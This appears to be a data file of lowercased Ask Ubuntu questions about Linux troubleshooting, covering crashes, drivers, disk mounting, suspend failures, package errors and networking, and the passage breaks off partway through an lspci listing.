513471	[ kubuntu 14.04 ] [ eclipse ] adt crashes at button ok from project properties	since i upgraded to kubuntu 14.04 , my eclipse crashes at different situations . mostly i can `` simulate '' it when going to project properties and press ok. then it always crashes . my system : distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04.1 lts '' my java : java version `` 1.8.0_05 '' java ( tm ) se runtime environment ( build 1.8.0_05-b13 ) java hotspot ( tm ) 64-bit server vm ( build 25.5-b02 , mixed mode ) my adt version : android development toolkit version : 23.0.0.1245622 i already tried to add this in adt-bundle-linux-x86_64/eclipse/configuration/configuration.ini org.eclipse.swt.browser.defaulttype=mozilla -dorg.eclipse.swt.browser.defaulttype=mozilla error : # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007fe049eb1718 , pid=5964 , tid=140601811232512 # # jre version : java ( tm ) se runtime environment ( 8.0_05-b13 ) ( build 1.8.0_05-b13 ) # java vm : java hotspot ( tm ) 64-bit server vm ( 25.5-b02 mixed mode linux-amd64 compressed oops ) # problematic frame : # c [ libgobject-2.0.so.0+0x19718 ] g_object_get_qdata+0x18 # # core dump written . default location : /home/maddin/core or core.5964 # # an error report file with more information is saved as : # /home/maddin/hs_err_pid5964.log compiled method ( nm ) 28866 4166 n 0 org.eclipse.swt.internal.gtk.os : :_g_object_get_qdata ( native ) total in heap [ 0x00007fe051da6790,0x00007fe051da6af0 ] = 864 relocation [ 0x00007fe051da68b0,0x00007fe051da68f8 ] = 72 main code [ 0x00007fe051da6900,0x00007fe051da6ae8 ] = 488 oops [ 0x00007fe051da6ae8,0x00007fe051da6af0 ] = 8 # # if you would like to submit a bug report , please visit : # http : //bugreport.sun.com/bugreport/crash.jsp # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . # now , as soon as i change systemsettings - > application apperance - > gtk - > gtkn-design to something else but `` oxygen-gtk '' this crash does n't happen anymore . but the application appearance also is ugly . beside that i get a lot of errors/warnings like that : ( swt:6148 ) : glib-gobject-critical ** : g_closure_add_invalidate_notifier : assertion 'closure- > n_inotifiers < closure_max_n_inotifiers ' failed or other gtk warnings from the particular design , not having theme-engine . which actually does n't cause any crahs it seems so far . so i have 3 options : accept crashes accept warnings ( maybe the best choice ) accept ugly design what can i do to solve this issue without changing the design settings ?
513472	enable com ports	i have a costume built computer in which i added two extra com ports . but i do n't know the exact name they were given ( e.g . ttys32 ) . i actually tested all 32 found ports in my computer , and non seem to be any of the added 2 . connecting and disconnecting devices to see which ports appear and disappear is not an option here , since this is not usb . how would i enable/configure these ports in ubuntu 12.04.1 ?
513477	reformating crashed un bootable but accesable ubuntu 10 drive	i have ubuntu 12.04 runing on a laptop and i have an older external drive that use to run ubuntu 10 . i was attempting to upgrade it but something went south and it will not boot now . i was able to access and copy the files i needed with the laptop using the external drive case . now i would like to reformat the drive and start fresh so i can install 12.04 on that drive as well . but i can not boot it so it dose not give me much permissions to do anything . how can i get rid of the old setup and reformat ?
513478	some errors on boot up	does someone know what the errors in the picture means ? i had to do a forced shotdown becouse it got stocked . se the image here the second try it showed some more errors but it was to fast to take a picture
513480	start jackd with realtime priority with upstart	i 'm trying to start jackd with realtime priority at boot with an uptstart script but with no success so far . i 'm using ubuntu server 14.04 . my upstart version is 1.12.1 . the user and group i 'm using in the script are allowed to use realtime priority , but when i run my upstart script that does not seems to matter . whenever i try to run it i get this on upstart log : jackdmp 1.9.10 copyright 2001-2005 paul davis and others . copyright 2004-2013 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details can not create thread 1 operation not permitted can not create thread 1 operation not permitted can not create thread 1 operation not permitted jack server starting in realtime mode with priority 70 can not lock down 82274202 byte memory area ( can not allocate memory ) can not create thread 1 operation not permitted error : messagebuffer not initialized : libffado 2.1.9999- built oct 19 2013 16:01:07 error : messagebuffer not initialized : 1408466326248438 : error ( posixthread.cpp ) [ 161 ] start : can not create realtime thread ( 1 : operation not permitted ) error : messagebuffer not initialized : 1408466326248486 : error ( posixthread.cpp ) [ 162 ] start : priority : 75 firewire err : ffado : error creating virtual device can not attach audio driver jackserver : :open failed with -1 failed to open server if i run it with my regular user it works fine . my upstart script is a very simple one : description `` jackd '' start on stopped rc stop on runlevel [ 06 ] exec su radiola -c `` jackd -r -p 70 -d firewire -r 44100 -n 3 -p 2048 '' i have also tried to use the setuid and setguid stanzas and start-stop-daemon but it ended up with the same results that i just described . is there a way to make upstart start realtime process ? if not , is there other solution to this problem ? thank you .
513481	wine error , packages being held , help please : s	i am getting this error : the following packages have unmet dependencies : udev : depends : libudev1 ( = 204-5ubuntu20.2 ) but 204-5ubuntu20.4 is to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . then i 've tried to apt-get dist-upgrade and i a similar error : the following packages have been kept back : libudev1 udev 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . what should i do ? i am using ubuntu 14.04 64 bits . the output of sudo apt-get -f install is : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . using ubuntu 14.04 i really need help guys , sry for double posting
513483	unity dash application search results - some icons appear as blank page icons	ubuntu 14.04 64bit on dell e6420 ( sandybridge graphics ) open unity dash search my filters are set only on `` applications '' and `` files & folders '' i type : software the results are good but some icons appear as blank page icons ( document ? ) example applications : `` ubuntu software centre '' and `` software & updates '' '' software updater '' has the correct application icon . ( the blank page icon look like a blank page with the top right corner folded . )
513486	copying data and syncing new data	part of data has been deleted and i have a backup . how can i copy back the data without syncing , and syncing only new data because the internet connection is very slow , and it is taking long time to upload all data again . so please is there any way to copy the backup without syncing , and syncing only the new data that are not in the backup . thank you for your response .
513490	is there a workaround to get the actions in rsibreak running ?	i face this bug : https : //bugs.launchpad.net/ubuntu/+source/rsibreak/+bug/1358849 if i change the settings in the tab `` actions '' , none of the changes is saved . i want to use mouse-speed [ 1 ] decelleration as penalty , but this does n't work , cause the setting to start a command on postpone isn't saved . [ 1 ] https : //github.com/rubo77/mouse-speed/ i use ubuntu 32 bit ( changed to ubuntu-desktop and upgraded from kubuntu 13.10 ) is there a way to fix this by hand somehow in some config files or such ?
513493	unable to force resolution	i 've got a system with a gtx 750 . i 've also got a 2560x1440 monitor . i 'm having trouble getting it to work at all . initially , i had an older graphics card installed and got the system up with 14.04 installed , using an old vga monitor . next , i installed my gtx750 and connected my new monitor . this ran fine at some low resolution . i added the xorg-edgers ppa and installed the nvidia-latest drivers . this gives me the option of nouveau , 340.32 and 343.13 as restricted drivers . things started going a bit wrong at this point , with the monitor not displaying anything past grub and the loading splash . i hooked my vga monitor back up to find a correctly displayed login prompt on that monitor , which worked fine . the new monitor was still inoperative . i then started fiddling with which driver was in use . with nouveau , the new monitor was n't detected at all , and the old one only at 640x480 , so i stuck to 343.13 . this runs the vga monitor properly at full resolution ( 1440x900 ) , but only detects the new monitor at 800x600 . the monitor displays nothing . i 've forced monitor resolutions in the past , so i tried using xrandr cvt 2560 1440 60 xrandr -- newmode # modeline xrandr -- addmode dvi-d-0 # mode this fails : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 37 current serial number in output stream : 38 i 've tried fiddling around with the ubuntu graphics options and the nvidia control panel to no avail , i ca n't seem to get anything to recognise the panel at above 800x600 resolution . i hooked up another dvi monitor ( 1920x1080 ) in the place of the 2560x1440 one and this worked in perfect dual monitor bliss with both at native resolution immediately . i 've also tried the 1920x1080 monitor with the 2560x1440 , and exactly the same problems occur . most strangely , the 2560x1440 monitor will load grub at native resolution , but gets lost as soon as the loading splash is over . how can i get my new monitor to work properly ?
513494	dual boot win7 ubuntu 13 ; stopped seeing win7 after working ok	i have a new pc which i set up some months ago with win 7 and ubuntu 12 dual booting , all of which appeared to work effectively as intended . i last closed it down in march . i do n't remember which os i shut it down from , and i do n't recall any abnormal events at that time . i started it up this week , and find i can not get win 7 . i have not knowingly made any changes to anything since i last shut it down , but when i select windows , the grub screen goes blank for a moment , and then just reappears - no crash . when i select one of the ubuntu options , it starts perfectly , and has since upgraded to ubuntu 13 . i do n't know where to start looking , to see whether a file somewhere has somehow disappeared , or where or why grub is looking and not finding . i 'm a complete newbie on ubuntu , but can normally manage ok with windows stuff . from reading around i see grub has upgraded , and partitions have been renumbered - could this have anything to do with it ? i have tried the windows disk which can still see the os , and selected the repair option , but it did not appear to see any problems with windows , just i ca n't get at it . any help would be appreciated .
513498	i need help recoverying an ntfs drive	i and running a live usb of ubuntu 14.04 trying to repair and restore my windows boot partition and/or trying to load the file system from the image i created with ddrescue . i am getting an input output error that reads like this : inode is corrupt ( 9 ) : input/output error below is what i have run on the image i made and the error i got again . it will mount the image but i ca n't access any of the files . any ideas are welcome . ubuntu @ ubuntu : ~ $ mmls /media/ubuntu/recovery/image dos partition table offset sector : 0 units are in 512-byte sectors slot start end length description 00 : meta 0000000000 0000000000 0000000001 primary table ( # 0 ) 01 : -- -- - 0000000000 0000002047 0000002048 unallocated 02 : 00:00 0000002048 0003074047 0003072000 unknown type ( 0x27 ) 03 : 00:01 0003074048 0476026879 0472952832 ntfs ( 0x07 ) 04 : 00:02 0476026880 0488396799 0012369920 hidden ifs/hpfs ( 0x17 ) 05 : -- -- - 0488396800 0488397167 0000000368 unallocated ubuntu @ ubuntu : ~ $ sudo mount -o loop , offset=1573912576 /media/ubuntu/recovery/image /media/ubuntu inode is corrupt ( 9 ) : input/output error
513499	mounting disk by uuid - file or directory does not exist ?	i have a ubuntu server ( 14.04 ) with a few issues . it 's rackmountable , but running the desktop version of ubuntu . it has 3 hdd bays and 1 internal ssd running the os . only one of the hdd bays is being used . every time i rebooted , i got the `` press s to skip mounting '' which meant i had to plug in a keyboard and go over to the rack every time i rebooted . i eventually solved this by adding the following line to my /etc/fstab file : uuid=3a8c7558-263d-4cb4-9b65-a4091560f4ab /osshare vfat utf8 , auto , rw , user , nobootwait 0 0 this worked great ! except now i ca n't mount the hdd at all . ideally , i 'd like to be able to mount it automatically on boot from the startup applications . i 've used the following line as a startup app the past , but it 's not working right now : /usr/bin/udisks -- mount /dev/disk/by-uuid/3a8c7558-263d-4cb4-9b65-a4091560f4ab so now when i boot up the server , it does n't require a keyboard ( awesome ) but it also wo n't boot . when i try to manually boot from terminal with udisks , it says : /usr/bin/udisks -- umount /dev/disk/by-uuid/3a8c7558-263d-4cb4-9b65-a4091560f4ab bash : /usr/bin/udisks : no such file or directory now i know that 's not true , because the output of ls -l /dev/disk/by-uuid/ is : total 0 lrwxrwxrwx 1 root root 10 aug 19 09:58 3a8c7558-263d-4cb4-9b65-a4091560f4ab - > ../../sdb1 lrwxrwxrwx 1 root root 10 aug 19 09:58 71e92938-0817-4690-b789-cca106869ebc - > ../../sda2 lrwxrwxrwx 1 root root 10 aug 19 09:58 94bd-a1de - > ../../sda1 lrwxrwxrwx 1 root root 10 aug 19 09:58 d93c0ed1-2498-49c5-8943-5fb8f6f118b1 - > ../../sda3 troubleshooting steps so far : -run the udisks mount command from terminal , output above -system reboot - no change -run udisks mount command but on /dev/sdb , same `` no such file or directory '' response -run udisks mount command but on /dev/sdb1 , same `` no such file or directory '' response i 'm stumped ! any input is much appreciated ! here is the output of sudo fdisk -l : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 117231407 58615703+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 4000.8 gb , 4000787030016 bytes 255 heads , 63 sectors/track , 486401 cylinders , total 7814037168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . ok , so as you all awesomely pointed out , udisks was n't even installed ... however now i have a new problem : when i try the mount command , it says `` mount failed '' usr/bin/udisks -- mount /dev/disk/by-uuid/3a8c7558-263d-4cb4-9b65-a4091560f4ab mount failed : error mounting : mount exited with exit code 1 : helper failed with : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so here 's the output of dmesg | tail : [ 12479.485796 ] fat-fs ( sdb1 ) : bogus number of reserved sectors [ 12479.485799 ] fat-fs ( sdb1 ) : ca n't find a valid fat filesystem i 'm not sure why it 's looking for a fat system , the disk is formatted as ext4 . edit2 : output of sudo blkid -c /dev/null -o list device fs_type label mount point uuid -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - /dev/sda1 vfat /boot/efi 94bd-a1de /dev/sda2 ext4 / 71e92938-0817-4690-b789-cca106869ebc /dev/sda3 swap < swap > d93c0ed1-2498-49c5-8943-5fb8f6f118b1 /dev/sdb1 ext4 nimbus_media ( not mounted ) 3a8c7558-263d-4cb4-9b65-a4091560f4ab
513501	ubiquity restarts the computer before step 5	i tell ubiquity to install alongside windows 7 but it does not show step 5 at all , it immediately reboots the computer ( shows the shut down splash screen with red dots and reboots ) .
513502	how to clean up windows in chromium	i 've been experimenting with xubuntu and i noticed something a little strange when using chromium . due to chromium 's unique `` tab '' feature , you essentially have a duplicate title bar that uses extra space . combine that with the uppermost panel and you essentially have three bars that say the same thing . how can i clean this up and eliminate some of the redundancy ?
513504	my installer does n't detect windows 7	so , this is not technically my first time installing ubuntu but hopefully will be my first successful time . i always get stuck on the partitioning . right now i hve some 92 gigs set as unallocated , according to windows partitioning tool . according to ubuntu installers `` something else '' partitioning tool it says it 's unusable . every tutorial i find online just says to click install alongside windows and presto , all done . but most completly ignore the something else . and my installer ca n't detect my os . so i just want to know how i can install ubuntu . i 'm at the point in the installer looking at this : /dev/sdb < - there 's no size on this one . /dev/sdb1 ntfs /dev/sdb2 ntfs < -biggest one , probably windows unusable < -this is where i want ubuntu to go . /dev/sdb3 ntfs /dev/sdb4 ntfs what do i do ?
513506	computer shutsdown without prompt after bluetooth del key pressed	summary when pressed the fn delete / lock key forces immediate shutsdown . i want to ignore this key or make it act as a regular del key . more info i have a bluetooth keyboard that has a delete/lock key directly above the 1/4th size backspace button , that i accidentally press all the time . this key will act as a regular delete key only when the function key ( fn ) is also pressed . this is fine when syncing with my phone as i just unlock the phone each time i accidentally press it , but on ubuntu 14.04lts it immediately shutsdown the machine without prompting for extra input . while it does seem to show the unity shutdown options for a half a second , it does not wait for input and the mouse already is n't listening as the shutdown sequence has already begun . is there any way to force ubuntu to read a keypress from a specific paired device as something else ? i would like to make it always act as backspace on this device . also , should n't this lock the system rather than shutdown ? is this possible , or are there any other suggestions ?
513508	developing 32 bit application and using it in 64 bit ubuntu 14.04	i would like to develop 32 bit c++ applications on an ubuntu 14.04 , 64 bit machine and use it on both 32 bit and 64 bit machines . one of the main difficulties i face is that i use some library which use 'unsigned long ' . i want 'unsigned long ' to take only 4 bytes to work the application properly . how can i compile 32 bit application on 64 bit machine ?
513512	unable to locate package gbedi-core	trying to install gdebi using this command : sudo apt-get install aptitude synaptic gbedi-core but i 'm getting this error unable to locate package gbedi-core ''
513514	installing roundcube with a database administrator other than `` root '' ?	i am trying to install roundcube for webmail support on an ubuntu server . after running : apt-get install roundcube roundcube-plugins roundcube-plugins-extra you go through the setup process which can be summed up like this : configure database for roundcube with dbconfig-common ? < -- yes database type to be used by roundcube : < -- mysql password of the database 's administrative user : < -- yourrootsqlpassword ( the password of the mysql root user ) mysql application password for roundcube : < -- roundcubesqlpassword password confirmation : < -- roundcubesqlpassword this will not work if your database administrator is not root ( e.g . the db admin is bob ) how would i envoke a change in the mysql administrator username during setup ? thanks !
513516	ubuntu 14.04 32bit inodes nfs export	after upgrade from 12.04 to 14.04 some files from nfs exported directories became unaccessible for 32-bit applications on clients . i 've found that previously there was sysctl vfs.nfsrv.do_32bit_fileid=1 parameter for such situations , but now this parameter is obsolete . how could i tell nfs server to export 32bit inodes ? upd : setting kernel parameter nfs.enable_ino64=0 does not help as well ...
513518	macmini ( running ubuntu 14.04 ) loses wlan connection when uploading larger files ( several 100 mb ) via owncloud	i installed ubuntu 14.04 on an old macmini with the intention of running it as a homeserver . additionally i installed owncloud and tried to sync some files both from a laptop running elementaryos and a desktop running windows 7 . syncing smaller files workes like a charm ( 4000 files at < 10mb each ) but when it comes to bigger files ( 1 gb ubuntu iso e.g . ) the upload failes after 20-100mb . i ca n't ping the server anymore and the server ca n't ping me . it still shows up in our router as connected though . disconnecting and reconnecting the wlan connection fixes the issue until the next attempt at syncing . edit : i also had to install the wlan driver with this manual : https : //help.ubuntu.com/community/macbookpro8-2 # wireless
513519	synaptic package manager console size	when using synaptic package manager i select packages to be upgraded , after clicking apply it shows the changes in a terminal window ( like i want it to ) . but the terminal window is tiny in size , whenever i resize this it never remembers the size i set the terminal . why ? how can i fix this ? details : ubuntu 12.04.5 lts precise synaptic 0.80~expraring1
513520	just upgraded to ubuntu 14.04 from 13.03 but system will not boot !	just upgraded to ubuntu 14.04 from 13.03 but system will not boot ! the screen says : udevadm trigger is not permitted while udev is unconfigured . gave up waiting for root device . common problems : boot args ( cat/proc/cmdline ) check rootdelay= ( did the system wait long enough ? ) check root= ( did the system wait for the right device ? ) missing modules ( cat/proc/modules ; ls/dev ) alert ! /dev/disk/by-uuid/dd1dad95-9bd3-429e-8e94-3f1d49da20e7 does not exist . dropping to a shell ! busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _
513523	sudo command problem on ubuntu 14.04	when type sudo command by terminal then show error , how to fix this sudo : /etc/sudoers is owned by uid 1000 , should be 0 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin
513524	disk space discrepancy between gparted and properties	all . gparted details that 100gb of my mounted sda1 are in use . however , if i select all folders within sda1 ( while utilizing gksu nautilus ) and acquire its properties , it reads that the usage of the folders in total only adds to 60gb . i 've researched the issue and found that others have had similar problems , but their `` lost space '' has regularly added up to the blocks being reserved by linux for the root user . for my mounted sda1 , the reserve block amount only adds up to about 9gb , so i still have approximately 30gb unaccounted for . check screenshot below : so , in the end , what would account for such a discrepancy or loss , and how can this loss of space be investigated furter/reclaimed ? thank you all for your thoughts in advance ! !
513525	error installing linux generic kernel ovh ubuntu 14.04	i have recently purchased a vps from ovh and i was trying to install the generic kernel on ubuntu ( as they supply a custom kernel ) apt-get install linux-image-generic but i got an error . setting up linux-image-3.13.0-34-generic ( 3.13.0-34.60 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.13.0-34-generic vmlinuz ( /boot/vmlinuz-3.13.0-34-generic ) points to /boot/vmlinuz-3.13.0-34-generic ( /boot/vmlinuz-3.13.0-34-generic ) -- doing nothing at /var/lib/dpkg/info/linux-image-3.13.0-34-generic.postinst line 491 . examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-34-generic /boot/vmlinuz-3.13.0-34-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-34-generic /boot/vmlinuz-3.13.0-34-generic update-initramfs : generating /boot/initrd.img-3.13.0-34-generic e : /usr/share/initramfs-tools/hooks/fixrtc failed with return 1. update-initramfs : failed for /boot/initrd.img-3.13.0-34-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.13.0-34-generic.postinst line 1025. dpkg : error processing package linux-image-3.13.0-34-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.13.0-34-generic : linux-image-extra-3.13.0-34-generic depends on linux-image-3.13.0-34-generic ; however : package linux-image-3.13.0-34-generic is not configured yet . dpkg : error processing package linux-image-extra-3.13.0-34-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.13.0-34-generic ; however : package linux-image-3.13.0-34-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.13.0-34-generic ; however : package linux-image-extra-3.13.0-34-generic is not configured yet . dpkg : error processing package linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.13.0-34-generic linux-image-extra-3.13.0-34-generic linux-image-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
513526	top like utility for network activity/ports by process	i 'm looking for a utility to continuously monitor network traffic by process . something like top but instead of focusing on cpu/memory , i would like to see tcp and udp ports and throughput for the most network-active processes . i imagine a regularly updated screen with headers like : pid user proto portno kbps starttime command ... the closest i could find are atop and lsof -i. atop shows aggregate network activity in the main screen ( not by process ) . hitting n for a network focused view gives : kernel module 'netatop ' not active or no root privs ; request ignored ! # when run under sudo , so how do i install the 'netatop ' kernel module ? lsof -i shows the processes holding the ports , but no throughput/activity . any tips appreciated .
513529	ubuntu 12.10 ( 32 bit ) : ssh not available and not installing	i am installing ssh on my ubuntu 12.10 quantal . to see whether ssh is there or not on my machine . i used these commands . which ssh which sshd it did n't show any output . then i tried to install ssh using the below command : sudo apt-get install openssh-client openssh-server however i am getting this error : reading package lists ... done building dependency tree reading state information ... done package ssh is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package ssh has no installation candidate . i have run apt-get update command also but still it is throwing the same error .
513533	suspend not working 14.04	i 'm aware that this has been covered in multiple places , but none of the solutions seem to work for me . i 'm on an old core 2 duo laptop , which refuses to suspend/hibernate . instead , it immediately awakens . first thing i did was to check the dmesg output , which reads : [ 11090.873908 ] sd 0:0:0:0 : [ sda ] stopping disk [ 11090.873974 ] cfg80211 : calling crda to update world regulatory domain [ 11090.948067 ] tpm_tis 00:01 : error ( 38 ) sending savestate before suspend [ 11090.948073 ] __pnp_bus_suspend ( ) : tpm_pm_suspend+0x0/0x1c0 returns 38 [ 11090.948077 ] dpm_run_callback ( ) : pnp_bus_suspend+0x0/0x20 returns 38 [ 11090.948080 ] pm : device 00:01 failed to suspend : error 38 [ 11093.165642 ] pm : some devices failed to suspend , or early wake event detected [ 11093.167005 ] sd 0:0:0:0 : [ sda ] starting disk a quick google for some quotes from this snippet did not yield anything that could help me , but you can clearly see something is going wrong . next was a check for the wakeup devices ( cat /proc/acpi/wakeup ) device s-state status sysfs node hdef s4 *disabled pci:0000:00:1b.0 pxs3 s5 *enabled pci:0000:04:00.0 lanc s0 *disabled modm s3 *disabled disabling the only enabled device ( no idea what it represents ) had no effect whatsoever . i 've also tried doing it manually using echo mem > /sys/power/state echo disk > /sys/power/state both these lines had the same effect : immediate wakeup . anything obvious i have n't tried yet ? btw : kernel 3.13.0-34-generic
513534	can not delete encrypted btrfs snapshot	i created a btrfs snapshot some time ago and now i want to delete it , as it appears to be taking up a lot of space . when i list snapshots , i get : 11:59:16 : :root @ pounamu : :/mnt ↪ btrfs subvolume list / id 257 gen 99338 top level 5 path @ id 258 gen 99338 top level 5 path @ home id 263 gen 99315 top level 5 path @ home/.ecryptfs/mlissner/.private/ecryptfs_fnek_encrypted.fwa8iodatukmnerokgj4b5ozhz0bkoqrvaqxu4dgx.2jueljl22wpv94ou -- /ecryptfs_fnek_encrypted.fwa8iodatukmnerokgj4b5ozhz0bkoqrvaqxhuntlbs-30ihyukjey9-ee -- /root_post_install_2014-04-29 i believe the snapshot i want to delete is the last one , so i run : 11:58:29 : :root @ pounamu : :/mnt ↪ btrfs subvolume delete /home/mlissner/.private/ecryptfs_fnek_encrypted.fwa8iodatukmnerokgj4b5ozhz0bkoqrvaqxu4dgx.2jueljl22wpv94ou -- /ecryptfs_fnek_encrypted.fwa8iodatukmnerokgj4b5ozhz0bkoqrvaqxhuntlbs-30ihyukjey9-ee -- /root_post_install_2014-04-29/ delete subvolume '/home/.ecryptfs/mlissner/.private/ecryptfs_fnek_encrypted.fwa8iodatukmnerokgj4b5ozhz0bkoqrvaqxu4dgx.2jueljl22wpv94ou -- /ecryptfs_fnek_encrypted.fwa8iodatukmnerokgj4b5ozhz0bkoqrvaqxhuntlbs-30ihyukjey9-ee -- /root_post_install_2014-04-29' error : can not delete '/home/.ecryptfs/mlissner/.private/ecryptfs_fnek_encrypted.fwa8iodatukmnerokgj4b5ozhz0bkoqrvaqxu4dgx.2jueljl22wpv94ou -- /ecryptfs_fnek_encrypted.fwa8iodatukmnerokgj4b5ozhz0bkoqrvaqxhuntlbs-30ihyukjey9-ee -- /root_post_install_2014-04-29 ' - device or resource busy unfortunately , it says , `` device or resource busy '' . this makes me very nervous because it makes it appear that i might be deleting something i should n't . nevertheless , i 've tried logging in as another user in order to free up the device . unfortunately , when the user is not logged in , the directory ( snapshot ) does n't exist because the encrypted directory is n't mounted ! this feels like a major cache 22 : i ca n't delete it when logged in because it 's busy ; i ca n't delete it when logged out because it does n't exist ! i 'm fairly certain all my headaches are because i 'm trying to use an encrypted home directory with btrfs . can somebody help me to 1 ) confirm that i 'm not deleting something i should keep , and 2 ) sort out how to delete the snapshot ?
513537	ca n't run ubuntu 14.04	i asked this question previously in this forum and offered bounty as well and did n't get rid of the problem . and now the question is closed as off topic , i 'm not quite sure whether it is good to ask this again here but i need help . up until now i re-intalled 13.04 and now since ubuntu 13.04 is unsupported i ca n't download any software from software center . so i have to install it anyway . now i make bootable pendrive from startup disk creator and select try ubuntu and the same problem asked in this question persists with try ubuntu as well . i have to anyhow install 14.04 . i 've been frustrated , please help me .
513538	how to delete windows ?	i realize this question must have been put before and there is answers lying about . i did n't manage to find them . i hope some kind soul will show me where to look . how can every freaking aspect of windows on my computer be deleted ? failed to do so during the actual installation ... thanks/
513539	internet drops out when using shared hub or streaming media	depending on the network i 'm connected to my ( wireless ) internet will drop out every 30 seconds to every few hours . how often i drop out ( seemingly ) depends on the network , and the amount of traffic going through it . this leads me to believe packet collision is causing issues . when dropping out the unity icon shows i am still connected though i will be unable to ping google , facebook or any other site - they are still accessible via other devices on the same network . occasionally , but not always , this can be simply rectified by disconnecting and re-connecting , deleting the network via network manager or restarting the computer . this is not preferable . i 'm using ubuntu 14.04 , here is the output of lspci -v and lshw -c network . i do n't have the expertise or the time to diagnose much further by myself . answers to other questions have n't worked for me . i would appreciate any help . lspci -v ashton @ laptop : ~ $ lspci -v 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) subsystem : sony corporation device 90ab flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=06 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : c0000000-c0ffffff prefetchable memory behind bridge : 00000000b0000000-00000000bfffffff capabilities : < access denied > kernel driver in use : pcieport 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : sony corporation device 90ab flags : bus master , medium devsel , latency 0 , irq 41 memory at c1300000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) subsystem : sony corporation device 90ab flags : bus master , fast devsel , latency 0 , irq 45 memory at c1314000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : sony corporation device 90ab flags : bus master , medium devsel , latency 0 , irq 16 memory at c1319000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : sony corporation device 90ab flags : bus master , fast devsel , latency 0 , irq 46 memory at c1310000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=07 , subordinate=07 , sec-latency=0 memory behind bridge : c1200000-c12fffff prefetchable memory behind bridge : 00000000c1500000-00000000c15fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=08 , subordinate=08 , sec-latency=0 memory behind bridge : c1100000-c11fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=09 , subordinate=09 , sec-latency=0 i/o behind bridge : 00002000-00002fff prefetchable memory behind bridge : 00000000c1000000-00000000c10fffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 